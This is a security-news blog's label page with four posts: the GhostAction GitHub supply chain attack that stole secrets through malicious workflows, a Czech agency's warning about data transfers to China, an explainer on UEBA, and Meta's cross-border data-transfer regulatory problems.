Search This Blog
Powered by Blogger.

Blog Archive

Labels

Footer About

Footer About

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Data Transfer. Show all posts
Malware Attack
Cyber Attacks Cyber Hackers Data Leak data security Data Transfer Database Security GitHub leaked sensitive data Malicious Files Malware Attack

GitHub Supply Chain Attack ‘GhostAction’ Exposes Over 3,000 Secrets Across Ecosystems

 

A newly uncovered supply chain attack on GitHub, named GhostAction, has compromised more than 3,300 secrets across multiple ecosystems, including PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS. The campaign was first identified by GitGuardian researchers, who traced initial signs of suspicious activity in the FastUUID project on September 2, 2025. The attack relied on compromised maintainer accounts, which were used to commit malicious workflow files into repositories. These GitHub Actions workflows were configured to trigger automatically on push events or manual dispatch, enabling the attackers to extract sensitive information. 

Once executed, the malicious workflow harvested secrets from GitHub Actions environments and transmitted them to an attacker-controlled server through a curl POST request. In FastUUID’s case, the attackers accessed the project’s PyPI token, although no malicious package versions were published before the compromise was detected and contained. Further investigation revealed that the attack extended well beyond a single project. Researchers found similar workflow injections across at least 817 repositories, all exfiltrating data to the same domain. To maximize impact, the attackers enumerated secret variables from existing legitimate workflows and embedded them into their own files, ensuring multiple types of secrets could be stolen. 

GitGuardian publicly disclosed the findings on September 5, raising issues in 573 affected repositories and notifying security teams at GitHub, npm, and PyPI. By that time, about 100 repositories had already identified the unauthorized commits and reverted them. Soon after the disclosures, the exfiltration endpoint used by the attackers went offline, halting further data transfers. 

The scope of the incident is significant, with researchers estimating that roughly 3,325 secrets were exposed. These included API tokens, access keys, and database credentials spanning several major platforms. At least nine npm packages and 15 PyPI projects remain directly affected, with the risk that compromised tokens could allow the release of malicious or trojanized versions if not revoked. GitGuardian noted that some companies had their entire SDK portfolios compromised, with repositories in Python, Rust, JavaScript, and Go impacted simultaneously. 

While the attack bears some resemblance to the s1ngularity campaign reported in late August, GitGuardian stated that it does not see a direct connection between the two. Instead, GhostAction appears to represent a distinct, large-scale attempt to exploit open-source ecosystems through stolen maintainer credentials and poisoned automation workflows. The findings underscore the growing challenges in securing supply chains that depend heavily on public code repositories and automated build systems.
Read more »
protecting sensitive data
China Critical Infrastructure cyber espionage Cyber Security Czech data security Data Transfer protecting sensitive data

Czechia Warns of Chinese Data Transfers and Espionage Risks to Critical Infrastructure

 

Czechia’s National Cyber and Information Security Agency (NÚKIB) has issued a stark warning about rising cyber espionage campaigns linked to China and Russia, urging both government institutions and private companies to strengthen their security measures. The agency classified the threat as highly likely, citing particular concerns over data transfers to China and remote administration of assets from Chinese territories, including Hong Kong and Macau. According to the watchdog, these operations are part of long-term efforts by foreign states to compromise critical infrastructure, steal sensitive data, and undermine public trust. 

The agency’s concerns are rooted in China’s legal and regulatory framework, which it argues makes private data inherently insecure. Laws such as the National Intelligence Law of 2017 require all citizens and organizations to assist intelligence services, while the 2015 National Security Law and the 2013 Company Law provide broad avenues for state interference in corporate operations. Additionally, regulations introduced in 2021 obligate technology firms to report software vulnerabilities to government authorities within two days while prohibiting disclosure to foreign organizations. NÚKIB noted that these measures give Chinese state actors sweeping access to sensitive information, making foreign businesses and governments vulnerable if their data passes through Chinese systems. 

Hong Kong and Macau also fall under scrutiny in the agency’s assessment. In Hong Kong, the 2024 Safeguarding National Security Ordinance integrates Chinese security laws into its own legal system, broadening the definition of state secrets. Macau’s 2019 Cybersecurity Law grants authorities powers to monitor data transmissions from critical infrastructure in real time, with little oversight to prevent misuse. NÚKIB argues that these developments extend the Chinese government’s reach well beyond its mainland jurisdiction. 

The Czech warning gains credibility from recent attribution efforts. Earlier this year, Prague linked cyberattacks on its Ministry of Foreign Affairs to APT31, a group tied to China’s Ministry of State Security, in a campaign active since 2022. The government condemned the attacks as deliberate attempts to disrupt its institutions and confirmed a high degree of certainty about Chinese involvement, based on cooperation among domestic and international intelligence agencies. 

These warnings align with broader global moves to limit reliance on Chinese technologies. Countries such as Germany, Italy, and the Netherlands have already imposed restrictions, while the Five Eyes alliance has issued similar advisories. For Czechia, the implications are serious: NÚKIB highlighted risks across devices and systems such as smartphones, cloud services, photovoltaic inverters, and health technology, stressing that disruptions could have wide-reaching consequences. The agency’s message reflects an ongoing effort to secure its digital ecosystem against foreign influence, particularly as geopolitical tensions deepen in Europe.
Read more »
UEBA
Artificial Intelligence Data Transfer Technology UEBA

UEBA: A Smarter Way to Fight AI-Driven Cyberattacks

 



As artificial intelligence (AI) grows, cyberattacks are becoming more advanced and harder to stop. Traditional security systems that protect company networks are no longer enough, especially when dealing with insider threats, stolen passwords, and attackers who move through systems unnoticed.

Recent studies warn that cybercriminals are using AI to make their attacks faster, smarter, and more damaging. These advanced attackers can now automate phishing emails and create malware that changes its form to avoid being caught. Some reports also show that AI is helping hackers quickly gather information and launch more targeted, widespread attacks.

To fight back, many security teams are now using a more intelligent system called User and Entity Behavior Analytics (UEBA). Instead of focusing only on known attack patterns, UEBA carefully tracks how users normally behave and quickly spots unusual activity that could signal a security problem.


How UEBA Works

Older security tools were based on fixed rules and could only catch threats that had already been seen before. They often missed new or hidden attacks, especially when hackers used AI to disguise their moves.

UEBA changed the game by focusing on user behavior. It looks for sudden changes in the way people or systems normally act, which may point to a stolen account or an insider threat.

Today, UEBA uses machine learning to process huge amounts of data and recognize even small changes in behavior that may be too complex for traditional tools to catch.


Key Parts of UEBA

A typical UEBA system has four main steps:

1. Gathering Data: UEBA collects information from many places, including login records, security tools, VPNs, cloud services, and activity logs from different devices and applications.

2. Setting Normal Behavior: The system learns what is "normal" for each user or system—such as usual login times, commonly used apps, or regular network activities.

3. Spotting Unusual Activity: UEBA compares new actions to normal patterns. It uses smart techniques to see if anything looks strange or risky and gives each unusual event a risk score based on its severity.

4. Responding to Risks: When something suspicious is found, the system can trigger alerts or take quick action like locking an account, isolating a device, or asking for extra security checks.

This approach helps security teams respond faster and more accurately to threats.


Why UEBA Matters

UEBA is especially useful in protecting sensitive information and managing user identities. It can quickly detect unusual activities like unexpected data transfers or access from strange locations.

When used with identity management tools, UEBA can make access control smarter, allowing easy entry for low-risk users, asking for extra verification for medium risks, or blocking dangerous activities in real time.


Challenges in Using UEBA

While UEBA is a powerful tool, it comes with some difficulties. Companies need to collect data from many sources, which can be tricky if their systems are outdated or spread out. Also, building reliable "normal" behavior patterns can be hard in busy workplaces where people’s routines often change. This can lead to false alarms, especially in the early stages of using UEBA.

Despite these challenges, UEBA is becoming an important part of modern cybersecurity strategies.

Read more »
WhatsApp updates
Data Transfer legal and regulatory issues Meta Technology UPI WhatsApp WhatsApp Pay WhatsApp updates

Mata: Challenges in Data Transfer Between Countries May Affect Services


Meta, in a recent report, stated how its inability to transfer data "between countries and regions," where the company operates, may alter its ability to provide services to its users. The company added that this issue may further affect its financial results.

Apparently, Meta has been facing lawsuits in Europe and India, along with other jurisdictions for its 2016 and 2021 updates on WhatsApp on the basis of its service and privacy policy.

In a statement provided on Wednesday, Meta wrote, "If we are unable to transfer data between and among countries and regions in which we operate, or if we are restricted from sharing data among our products and services, it could affect our ability to provide our services, the manner in which we provide our services or our ability to target ads, which could adversely affect our financial results."

The multinational conglomerate further noted that countries like India and Turkey are apparently considering enacting legislation that requires local data storage and processing or is considering doing so already.

These legislative laws “could increase the cost and complexity of delivering our services, cause us to cease the offering of our products and services in certain countries, or result in fines or other penalties," the company said in Form 10-K.

The company has been under continuous legal and regulatory issues in a number of jurisdictions, one being India.

The Competition Commission of India is currently looking into the issue, investigating Meta for its alleged anti-competitive practices. Adding to this, the company is also facing lawsuits in regard to its unified payments interface (UPI) service WhatsApp Pay.

Amidst the ongoing investigations and legal actions, Amrita Mukherjee, Director, Legal, India operations, was purportedly fired by the corporation as part of a recent series of layoffs. The layoff has been a component of Meta's downsizing strategy, which was disclosed in March and will affect some 10,000 employees worldwide.

The issue is especially significant for Meta, since it has a weighty presence in India, with more than half a billion users utilizing its services.

The company's daily active users (DAUs) grew by 4% to 2 billion on average through December 2022 from the previous year, according to its annual report. The top three countries for DAU growth during that time were Bangladesh, the Philippines, and India.  

Read more »
Subscribe to: Posts (Atom)